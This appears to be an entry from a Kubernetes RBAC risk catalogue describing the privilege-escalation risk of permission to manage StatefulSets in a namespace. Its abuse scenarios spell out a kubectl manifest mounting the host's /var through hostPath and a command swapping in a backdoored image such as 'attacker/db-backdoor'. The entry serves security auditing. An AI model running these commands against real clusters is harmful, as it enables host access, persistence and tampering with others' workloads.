Manage StatefulSets in a namespace
Elevation of Privilege
High
Overview
| Field | Value |
|---|---|
| ID | 1038 |
| Name | Manage StatefulSets in a namespace |
| Risk Category | Elevation of Privilege |
| Risk Level | High |
| Role Type | Role |
| API Groups | apps |
| Resources | statefulsets |
| Verbs | create, update, patch, delete |
| Tags | Persistence PotentialPrivilegeEscalation Tampering WorkloadLifecycle |
Description
Allows creating, updating, or deleting StatefulSets within a specific namespace. This can be used to deploy stateful applications with potentially privileged settings, leading to potential privilege escalation, persistence, and tampering within that namespace.
Abuse Scenarios
- Create a new StatefulSet with a hostPath mount in the namespace.
bash
kubectl create -n <namespace> -f - <<EOF
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: hostpath-statefulset
spec:
serviceName: "hostpath-service"
replicas: 1
selector:
matchLabels:
app: hostpath-sts
template:
metadata:
labels:
app: hostpath-sts
spec:
containers:
- name: hostpath-container
image: busybox
command: ["/bin/sh", "-c", "sleep infinity"]
volumeMounts:
- mountPath: /host-var
name: host-var
volumes:
- name: host-var
hostPath:
path: /var
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
- Update an existing StatefulSet’s image to a malicious one.
bash
kubectl set image statefulset/<statefulset-name> <container-name>=<malicious-image> -n <namespace>
# Example: kubectl set image statefulset/my-app-db db=attacker/db-backdoor -n production